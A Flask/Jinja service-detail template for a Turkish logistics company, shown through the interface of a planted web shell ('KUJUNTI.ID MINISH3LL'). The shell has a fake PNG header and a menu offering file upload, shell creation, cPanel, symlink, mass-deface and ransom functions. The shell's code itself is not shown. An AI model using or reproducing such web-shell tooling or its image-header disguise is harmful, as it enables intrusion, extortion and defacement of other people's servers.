\x89PNG\r\n\x1a\n\x00\x00\x00\x0DIHDR\x00\x00\x00\x01\x00 \x00\x00\x01\x08\x06\x00\x00\x00\x1F\x15\xC4\x89\x00\x00\x00 \x0AIDATx\x9Ccb\x00\x00\x00\x06\x00\x03\x1A\x05\x9D\x00\x00 \x00\x00IEND\xAE\x42\x60\x82 csarite.com
KUJUNTI.ID MINISH3LL
Path : /var/www/html/bosmar/TransportLogistics/templates/
(S)h3ll Cr3at0r :
F!le Upl0ad :

B-Con CMD Config cPanel C-Rdp D-Log Info Jump Mass Ransom Symlink vHost Zone-H

Current File : /var/www/html/bosmar/TransportLogistics/templates/service_detail.html


{% extends 'base.html' %}

{% block title %}{{ service.title }} - Bosmar Trans{% endblock %}

{% block content %}
    <!-- Page Header -->
    <div class="container my-5">
        <div class="row">
            <div class="col-12 text-center">
                <nav aria-label="breadcrumb">
                    <ol class="breadcrumb justify-content-center">
                        <li class="breadcrumb-item"><a href="{{ url_for('index') }}">{{ _('Home') }}</a></li>
                        <li class="breadcrumb-item"><a href="{{ url_for('service_list') }}">{{ _('Services') }}</a></li>
                        <li class="breadcrumb-item active" aria-current="page">{{ service.title }}</li>
                    </ol>
                </nav>
            </div>
        </div>
    </div>
    
    <!-- Service Content -->
    <section class="py-5">
        <div class="container">
            <div class="row">
                <div class="col-lg-8">
                    <div class="service-detail">
                        <div class="mb-4">
                            <img src="{{ service.thumbnail }}" alt="{{ service.title }}" class="img-fluid rounded w-100">
                        </div>
                        
                        <h1 class="text-primary mb-4">{{ service.title }}</h1>
                        
                        <div class="service-description">
                            <p class="lead">{{ service.description }}</p>
                            <p>{{ service.content }}</p>
                            
                            <!-- Extended content based on service type -->
                            {% if service.id == 1 %}
                                <!-- Sea Container Transport -->
                                <h3 class="text-primary mt-5 mb-3">{{ _('Our Sea Container Services Include:') }}</h3>
                                <ul class="list-group list-group-flush mb-4">
                                    <li class="list-group-item d-flex">
                                        <i class="fas fa-ship text-primary me-3 mt-1"></i>
                                        <div>
                                            <strong>{{ _('Full Container Load (FCL):') }}</strong> {{ _('Dedicated containers for your shipments, optimizing costs for larger cargo volumes.') }}
                                        </div>
                                    </li>
                                    <li class="list-group-item d-flex">
                                        <i class="fas fa-boxes text-primary me-3 mt-1"></i>
                                        <div>
                                            <strong>{{ _('Less than Container Load (LCL):') }}</strong> {{ _('Cost-effective solutions for smaller shipments through container sharing.') }}
                                        </div>
                                    </li>
                                    <li class="list-group-item d-flex">
                                        <i class="fas fa-file-contract text-primary me-3 mt-1"></i>
                                        <div>
                                            <strong>{{ _('Documentation & Customs Clearance:') }}</strong> {{ _('Expert handling of all shipping documents and customs procedures.') }}
                                        </div>
                                    </li>
                                    <li class="list-group-item d-flex">
                                        <i class="fas fa-route text-primary me-3 mt-1"></i>
                                        <div>
                                            <strong>{{ _('Door-to-Door Services:') }}</strong> {{ _('Complete logistics solutions from origin to final destination.') }}
                                        </div>
                                    </li>
                                    <li class="list-group-item d-flex">
                                        <i class="fas fa-search-location text-primary me-3 mt-1"></i>
                                        <div>
                                            <strong>{{ _('Real-time Tracking:') }}</strong> {{ _('Advanced systems for monitoring your cargo throughout the journey.') }}
                                        </div>
                                    </li>
                                </ul>
                                
                                <h3 class="text-primary mt-5 mb-3">{{ _('Specialized Container Solutions') }}</h3>
                                <p>{{ _('We offer a range of specialized container options to accommodate various cargo types:') }}</p>
                                <div class="row mb-4">
                                    <div class="col-md-6 mb-3">
                                        <div class="card h-100">
                                            <div class="card-body">
                                                <h5 class="card-title">{{ _('Refrigerated Containers') }}</h5>
                                                <p class="card-text">{{ _('Temperature-controlled solutions for perishable goods, pharmaceuticals, and other sensitive products.') }}</p>
                                            </div>
                                        </div>
                                    </div>
                                    <div class="col-md-6 mb-3">
                                        <div class="card h-100">
                                            <div class="card-body">
                                                <h5 class="card-title">{{ _('Open Top Containers') }}</h5>
                                                <p class="card-text">{{ _('Ideal for oversized cargo that needs to be loaded from the top, such as machinery or large equipment.') }}</p>
                                            </div>
                                        </div>
                                    </div>
                                    <div class="col-md-6 mb-3">
                                        <div class="card h-100">
                                            <div class="card-body">
                                                <h5 class="card-title">{{ _('Flat Rack Containers') }}</h5>
                                                <p class="card-text">{{ _('Designed for heavy, bulky cargo that exceeds standard container dimensions.') }}</p>
                                            </div>
                                        </div>
                                    </div>
                                    <div class="col-md-6 mb-3">
                                        <div class="card h-100">
                                            <div class="card-body">
                                                <h5 class="card-title">{{ _('Tank Containers') }}</h5>
                                                <p class="card-text">{{ _('Secure transportation for liquid cargo, including hazardous and non-hazardous materials.') }}</p>
                                            </div>
                                        </div>
                                    </div>
                                </div>
                                
                                <h3 class="text-primary mt-5 mb-3">{{ _('Global Port Network') }}</h3>
                                <p>{{ _('Bosmar Trans maintains strong relationships with major shipping lines and port operators worldwide, allowing us to offer reliable services on all major trade routes.') }}</p>
                            {% elif service.id == 2 %}
                                <!-- Air Cargo -->
                                <h3 class="text-primary mt-5 mb-3">{{ _('Our Air Cargo Services Include:') }}</h3>
                                <ul class="list-group list-group-flush mb-4">
                                    <li class="list-group-item d-flex">
                                        <i class="fas fa-plane text-primary me-3 mt-1"></i>
                                        <div>
                                            <strong>{{ _('Express Air Freight:') }}</strong> {{ _('Priority service for time-critical shipments with guaranteed delivery timeframes.') }}
                                        </div>
                                    </li>
                                    <li class="list-group-item d-flex">
                                        <i class="fas fa-calendar-alt text-primary me-3 mt-1"></i>
                                        <div>
                                            <strong>{{ _('Standard Air Freight:') }}</strong> {{ _('Regular scheduled services balancing cost efficiency with reasonable transit times.') }}
                                        </div>
                                    </li>
                                    <li class="list-group-item d-flex">
                                        <i class="fas fa-boxes text-primary me-3 mt-1"></i>
                                        <div>
                                            <strong>{{ _('Consolidated Air Freight:') }}</strong> {{ _('Cost-effective solution for smaller shipments combined with others to the same destination.') }}
                                        </div>
                                    </li>
                                    <li class="list-group-item d-flex">
                                        <i class="fas fa-temperature-low text-primary me-3 mt-1"></i>
                                        <div>
                                            <strong>{{ _('Specialized Cargo Handling:') }}</strong> {{ _('Solutions for temperature-sensitive, valuable, hazardous, and oversized shipments.') }}
                                        </div>
                                    </li>
                                    <li class="list-group-item d-flex">
                                        <i class="fas fa-file-alt text-primary me-3 mt-1"></i>
                                        <div>
                                            <strong>{{ _('Customs Clearance:') }}</strong> {{ _('Expert handling of all documentation and compliance requirements for smooth customs processing.') }}
                                        </div>
                                    </li>
                                </ul>
                                
                                <h3 class="text-primary mt-5 mb-3">{{ _('Industries We Serve') }}</h3>
                                <p>{{ _('Our air cargo services are tailored to meet the specific needs of various industries:') }}</p>
                                <div class="row mb-4">
                                    <div class="col-md-6 mb-3">
                                        <div class="card h-100">
                                            <div class="card-body">
                                                <h5 class="card-title">{{ _('Pharmaceuticals & Healthcare') }}</h5>
                                                <p class="card-text">{{ _('Temperature-controlled solutions with strict compliance to healthcare regulations and GDP standards.') }}</p>
                                            </div>
                                        </div>
                                    </div>
                                    <div class="col-md-6 mb-3">
                                        <div class="card h-100">
                                            <div class="card-body">
                                                <h5 class="card-title">{{ _('Electronics & Technology') }}</h5>
                                                <p class="card-text">{{ _('Secure handling of high-value electronic components with expedited delivery options.') }}</p>
                                            </div>
                                        </div>
                                    </div>
                                    <div class="col-md-6 mb-3">
                                        <div class="card h-100">
                                            <div class="card-body">
                                                <h5 class="card-title">{{ _('Automotive & Manufacturing') }}</h5>
                                                <p class="card-text">{{ _('Time-critical shipments for production lines and specialized handling for automotive parts.') }}</p>
                                            </div>
                                        </div>
                                    </div>
                                    <div class="col-md-6 mb-3">
                                        <div class="card h-100">
                                            <div class="card-body">
                                                <h5 class="card-title">{{ _('Fashion & Retail') }}</h5>
                                                <p class="card-text">{{ _('Fast delivery solutions for seasonal products and high-value garments.') }}</p>
                                            </div>
                                        </div>
                                    </div>
                                </div>
                                
                                <!-- Global Airline Partnerships section has been removed as requested -->
                            {% elif service.id == 3 %}
                                <!-- Road and Rail Transport -->
                                <h3 class="text-primary mt-5 mb-3">{{ _('Our Road and Rail Services Include:') }}</h3>
                                <ul class="list-group list-group-flush mb-4">
                                    <li class="list-group-item d-flex">
                                        <i class="fas fa-truck text-primary me-3 mt-1"></i>
                                        <div>
                                            <strong>{{ _('FTL (Full Truck Load):') }}</strong> {{ _('Dedicated vehicles for larger shipments, providing direct transport from origin to destination.') }}
                                        </div>
                                    </li>
                                    <li class="list-group-item d-flex">
                                        <i class="fas fa-truck-loading text-primary me-3 mt-1"></i>
                                        <div>
                                            <strong>{{ _('LTL (Less than Truck Load):') }}</strong> {{ _('Cost-effective solution for smaller shipments by sharing vehicle space with other consignments.') }}
                                        </div>
                                    </li>
                                    <li class="list-group-item d-flex">
                                        <i class="fas fa-train text-primary me-3 mt-1"></i>
                                        <div>
                                            <strong>{{ _('Intermodal Rail Transport:') }}</strong> {{ _('Environmentally friendly and cost-effective rail solutions for long-distance transportation.') }}
                                        </div>
                                    </li>
                                    <li class="list-group-item d-flex">
                                        <i class="fas fa-exchange-alt text-primary me-3 mt-1"></i>
                                        <div>
                                            <strong>{{ _('Multimodal Solutions:') }}</strong> {{ _('Combined transport modes (road-rail-sea) optimized for efficiency, cost, and sustainability.') }}
                                        </div>
                                    </li>
                                    <li class="list-group-item d-flex">
                                        <i class="fas fa-border-all text-primary me-3 mt-1"></i>
                                        <div>
                                            <strong>{{ _('Cross-Border Transport:') }}</strong> {{ _('Seamless international road and rail services with expert customs handling.') }}
                                        </div>
                                    </li>
                                </ul>
                                
                                <h3 class="text-primary mt-5 mb-3">{{ _('Vehicle Fleet and Equipment') }}</h3>
                                <p>{{ _('Our diverse fleet and equipment options can accommodate a wide range of cargo types:') }}</p>
                                <div class="row mb-4">
                                    <div class="col-md-6 mb-3">
                                        <div class="card h-100">
                                            <div class="card-body">
                                                <h5 class="card-title">{{ _('Standard Trucks') }}</h5>
                                                <p class="card-text">{{ _('For general cargo transportation, available in various sizes from 3.5 to 24 tons.') }}</p>
                                            </div>
                                        </div>
                                    </div>
                                    <div class="col-md-6 mb-3">
                                        <div class="card h-100">
                                            <div class="card-body">
                                                <h5 class="card-title">{{ _('Refrigerated Vehicles') }}</h5>
                                                <p class="card-text">{{ _('Temperature-controlled transport for perishable goods, maintaining product integrity throughout transit.') }}</p>
                                            </div>
                                        </div>
                                    </div>
                                    <div class="col-md-6 mb-3">
                                        <div class="card h-100">
                                            <div class="card-body">
                                                <h5 class="card-title">{{ _('Flatbed Trucks') }}</h5>
                                                <p class="card-text">{{ _('Ideal for oversized cargo, machinery, and construction materials requiring special handling.') }}</p>
                                            </div>
                                        </div>
                                    </div>
                                    <div class="col-md-6 mb-3">
                                        <div class="card h-100">
                                            <div class="card-body">
                                                <h5 class="card-title">{{ _('Container Chassis') }}</h5>
                                                <p class="card-text">{{ _('For transporting shipping containers seamlessly between ports, rail terminals, and final destinations.') }}</p>
                                            </div>
                                        </div>
                                    </div>
                                </div>
                                
                                <h3 class="text-primary mt-5 mb-3">{{ _('Rail Corridors and Coverage') }}</h3>
                                <p>{{ _('Our rail transport services operate along key corridors connecting major economic regions:') }}</p>
                                
                                <div class="row mt-4">
                                    <div class="col-12 mb-4">
                                        <div class="card bg-light">
                                            <div class="card-body">
                                                <h5 class="card-title">{{ _('Key Rail Routes:') }}</h5>
                                                <ul class="list-group list-group-flush">
                                                    <li class="list-group-item">
                                                        <strong>{{ _('Turkey-Europe Corridor:') }}</strong> {{ _('Connecting Turkish hubs to major European destinations through the Balkans.') }}
                                                    </li>
                                                    <li class="list-group-item">
                                                        <strong>{{ _('Middle East Connection:') }}</strong> {{ _('Linking Turkey with Middle Eastern markets via cross-border rail services.') }}
                                                    </li>
                                                    <li class="list-group-item">
                                                        <strong>{{ _('Trans-Asian Route:') }}</strong> {{ _('Part of the historic Silk Road, connecting Europe to Asia through Turkey, offering an alternative to sea shipping.') }}
                                                    </li>
                                                    <li class="list-group-item">
                                                        <strong>{{ _('Domestic Network:') }}</strong> {{ _('Comprehensive coverage of major industrial centers within Turkey.') }}
                                                    </li>
                                                </ul>
                                            </div>
                                        </div>
                                    </div>
                                </div>
                                
                                <h3 class="text-primary mt-5 mb-3">{{ _('Sustainability Focus') }}</h3>
                                <p>{{ _('Our road and rail services are designed with sustainability in mind:') }}</p>
                                <ul>
                                    <li>{{ _('Rail transport offers up to 75 percent reduction in carbon emissions compared to road freight for long distances') }}</li>
                                    <li>{{ _('Modern, fuel-efficient truck fleet with regular maintenance to minimize environmental impact') }}</li>
                                    <li>{{ _('Optimized routing and load consolidation to reduce empty runs and maximize efficiency') }}</li>
                                    <li>{{ _('Intermodal solutions combining the efficiency of rail with the flexibility of road transport') }}</li>
                                </ul>
                            {% endif %}
                        </div>
                    </div>
                </div>
                
                <div class="col-lg-4">
                    <!-- Service Sidebar -->
                    <div class="service-sidebar">
                        <!-- Contact Box -->
                        <div class="card mb-4 shadow">
                            <div class="card-body">
                                <h4 class="text-primary mb-3">{{ _('Need More Information?') }}</h4>
                                <p>{{ _('Contact our specialists for personalized solutions and detailed information about our services.') }}</p>
                                <div class="d-grid">
                                    <a href="{{ url_for('contact') }}" class="btn btn-primary mb-3">{{ _('Get in Touch') }}</a>
                                </div>
                                <div class="contact-info">
                                    <div class="d-flex align-items-center mb-2">
                                        <i class="fas fa-phone-alt text-primary me-2"></i>
                                        <span>+90 216 326 25 63, +90 216 325 79 86</span>
                                    </div>
                                    <div class="d-flex align-items-center mb-2">
                                        <i class="fas fa-envelope text-primary me-2"></i>
                                        <span>info@bosmar.com</span>
                                    </div>
                                </div>
                            </div>
                        </div>
                        
                        <!-- Other Services -->
                        <div class="card mb-4 shadow">
                            <div class="card-header bg-primary text-white">
                                <h5 class="m-0">{{ _('Our Services') }}</h5>
                            </div>
                            <div class="card-body">
                                <ul class="list-group list-group-flush">
                                    {% for other_service in services %}
                                        <li class="list-group-item {% if other_service.id == service.id %}active bg-light{% endif %}">
                                            <a href="{{ url_for('service_detail', service_id=other_service.id) }}" class="{% if other_service.id == service.id %}text-primary fw-bold{% endif %}">
                                                {{ other_service.title }}
                                            </a>
                                        </li>
                                    {% endfor %}
                                    <li class="list-group-item">
                                        <a href="#">{{ _('Warehousing & Distribution') }}</a>
                                    </li>
                                    <li class="list-group-item">
                                        <a href="#">{{ _('Customs Clearance') }}</a>
                                    </li>
                                    <li class="list-group-item">
                                        <a href="#">{{ _('Project Cargo') }}</a>
                                    </li>
                                </ul>
                            </div>
                        </div>
                        
                        <!-- Download Brochure -->
                        <div class="card mb-4 shadow">
                            <div class="card-body text-center">
                                <i class="fas fa-file-pdf fa-3x text-primary mb-3"></i>
                                <h5>{{ _('Service Brochure') }}</h5>
                                <p class="small">{{ _('Download our detailed service brochure for comprehensive information.') }}</p>
                                <div class="d-grid">
                                    {% if get_locale() == 'tr' %}
                                    <a href="{{ url_for('static', filename='bosmartTrans-Tr.pdf') }}" class="btn btn-outline-primary" target="_blank">
                                        <i class="fas fa-download me-2"></i> {{ _('Download PDF') }}
                                    </a>
                                    {% else %}
                                    <a href="{{ url_for('static', filename='bosmartTrans-EN.pdf') }}" class="btn btn-outline-primary" target="_blank">
                                        <i class="fas fa-download me-2"></i> {{ _('Download PDF') }}
                                    </a>
                                    {% endif %}
                                </div>
                            </div>
                        </div>
                        
                        <!-- Testimonial -->
                        <div class="card shadow">
                            <div class="card-body">
                                <div class="d-flex justify-content-center mb-3">
                                    <i class="fas fa-quote-left fa-2x text-primary"></i>
                                </div>
                                <p class="fst-italic text-center mb-3">{{ _('Bosmar Trans has been our trusted logistics partner for over 5 years. Their expertise and reliability have significantly improved our supply chain efficiency.') }}</p>
                                <div class="text-center">
                                    <strong>{{ _('Global Industries Ltd.') }}</strong><br>
                                    <small class="text-muted">{{ _('Satisfied Client') }}</small>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </section>
    
    <!-- Why Choose Us -->
    <section class="py-5 bg-light">
        <div class="container">
            <div class="row">
                <div class="col-12 text-center mb-5">
                    <h2 class="text-primary">{{ _('WHY CHOOSE OUR') }} {{ service.title }}</h2>
                    <p>{{ _('Key advantages that set our service apart') }}</p>
                </div>
                
                <div class="col-md-4 mb-4">
                    <div class="card h-100 border-0 shadow-sm">
                        <div class="card-body text-center p-4">
                            <div class="rounded-circle bg-primary text-white d-flex align-items-center justify-content-center mx-auto mb-4" style="width: 80px; height: 80px;">
                                <i class="fas fa-globe-americas fa-2x"></i>
                            </div>
                            <h4>{{ _('Global Coverage') }}</h4>
                            <p>{{ _('Our extensive network allows us to connect virtually any origin and destination worldwide, offering comprehensive logistics solutions.') }}</p>
                        </div>
                    </div>
                </div>
                
                <div class="col-md-4 mb-4">
                    <div class="card h-100 border-0 shadow-sm">
                        <div class="card-body text-center p-4">
                            <div class="rounded-circle bg-primary text-white d-flex align-items-center justify-content-center mx-auto mb-4" style="width: 80px; height: 80px;">
                                <i class="fas fa-handshake fa-2x"></i>
                            </div>
                            <h4>{{ _('Dedicated Service') }}</h4>
                            <p>{{ _('Each client is assigned a dedicated account manager who understands your business needs and provides personalized attention.') }}</p>
                        </div>
                    </div>
                </div>
                
                <div class="col-md-4 mb-4">
                    <div class="card h-100 border-0 shadow-sm">
                        <div class="card-body text-center p-4">
                            <div class="rounded-circle bg-primary text-white d-flex align-items-center justify-content-center mx-auto mb-4" style="width: 80px; height: 80px;">
                                <i class="fas fa-shield-alt fa-2x"></i>
                            </div>
                            <h4>{{ _('Reliability & Security') }}</h4>
                            <p>{{ _('With our proven track record of on-time deliveries and advanced cargo security measures, your shipments are always in safe hands.') }}</p>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </section>
    
    <!-- FAQ -->
    <section class="py-5">
        <div class="container">
            <div class="row justify-content-center">
                <div class="col-lg-10">
                    <h2 class="text-primary text-center mb-5">{{ _('FREQUENTLY ASKED QUESTIONS') }}</h2>
                    
                    <div class="accordion" id="serviceAccordion">
                        <div class="accordion-item">
                            <h2 class="accordion-header" id="headingOne">
                                <button class="accordion-button" type="button" data-bs-toggle="collapse" data-bs-target="#collapseOne" aria-expanded="true" aria-controls="collapseOne">
                                    {{ _('How do I request a quote for this service?') }}
                                </button>
                            </h2>
                            <div id="collapseOne" class="accordion-collapse collapse show" aria-labelledby="headingOne" data-bs-parent="#serviceAccordion">
                                <div class="accordion-body">
                                    {{ _('You can request a quote by filling out our contact form, sending an email to info@bosmar.com, or calling our customer service team. Please provide details about your shipment including origin, destination, cargo type, dimensions, and weight for an accurate quote.') }}
                                </div>
                            </div>
                        </div>
                        
                        <div class="accordion-item">
                            <h2 class="accordion-header" id="headingTwo">
                                <button class="accordion-button collapsed" type="button" data-bs-toggle="collapse" data-bs-target="#collapseTwo" aria-expanded="false" aria-controls="collapseTwo">
                                    {{ _('What is the typical transit time?') }}
                                </button>
                            </h2>
                            <div id="collapseTwo" class="accordion-collapse collapse" aria-labelledby="headingTwo" data-bs-parent="#serviceAccordion">
                                <div class="accordion-body">
                                    {{ _('Transit times vary depending on the specific origin and destination, service level selected, and current conditions. For standard services, typical transit times range from 1-2 days for domestic routes to 7-40 days for international shipments. Your account manager can provide more precise estimates based on your specific requirements.') }}
                                </div>
                            </div>
                        </div>
                        
                        <div class="accordion-item">
                            <h2 class="accordion-header" id="headingThree">
                                <button class="accordion-button collapsed" type="button" data-bs-toggle="collapse" data-bs-target="#collapseThree" aria-expanded="false" aria-controls="collapseThree">
                                    {{ _('Can you handle special cargo requirements?') }}
                                </button>
                            </h2>
                            <div id="collapseThree" class="accordion-collapse collapse" aria-labelledby="headingThree" data-bs-parent="#serviceAccordion">
                                <div class="accordion-body">
                                    {{ _('Yes, we specialize in handling various special cargo requirements including oversized cargo, hazardous materials, temperature-controlled shipments, and high-value goods. Our team has extensive experience in managing specialized logistics projects and can develop customized solutions for your unique requirements.') }}
                                </div>
                            </div>
                        </div>
                        
                        <div class="accordion-item">
                            <h2 class="accordion-header" id="headingFour">
                                <button class="accordion-button collapsed" type="button" data-bs-toggle="collapse" data-bs-target="#collapseFour" aria-expanded="false" aria-controls="collapseFour">
                                    {{ _('What documentation is required?') }}
                                </button>
                            </h2>
                            <div id="collapseFour" class="accordion-collapse collapse" aria-labelledby="headingFour" data-bs-parent="#serviceAccordion">
                                <div class="accordion-body">
                                    {{ _('Required documents typically include a commercial invoice, packing list, bill of lading or airway bill, certificate of origin, and any export/import permits or licenses specific to your cargo type and destination country. Our documentation team can provide detailed guidance based on your specific shipment requirements.') }}
                                </div>
                            </div>
                        </div>
                        
                        <div class="accordion-item">
                            <h2 class="accordion-header" id="headingFive">
                                <button class="accordion-button collapsed" type="button" data-bs-toggle="collapse" data-bs-target="#collapseFive" aria-expanded="false" aria-controls="collapseFive">
                                    {{ _('Do you offer cargo insurance?') }}
                                </button>
                            </h2>
                            <div id="collapseFive" class="accordion-collapse collapse" aria-labelledby="headingFive" data-bs-parent="#serviceAccordion">
                                <div class="accordion-body">
                                    {{ _('Yes, we offer comprehensive cargo insurance options to protect your shipments against loss or damage during transit. Insurance coverage can be tailored to your specific needs and cargo value. We recommend insuring all high-value shipments for full protection.') }}
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </section>
    
    <!-- Call to Action -->
    <section class="py-5 bg-primary text-white">
        <div class="container text-center">
            <h2 class="mb-4">{{ _('READY TO SHIP WITH BOSMAR TRANS?') }}</h2>
            <p class="lead mb-4">{{ _('Contact our team today to discuss your') }} {{ service.title }} {{ _('requirements.') }}</p>
            <a href="{{ url_for('contact') }}" class="btn btn-lg btn-light">{{ _('Request a Quote') }}</a>
        </div>
    </section>
{% endblock %}

© KUJUNTI.ID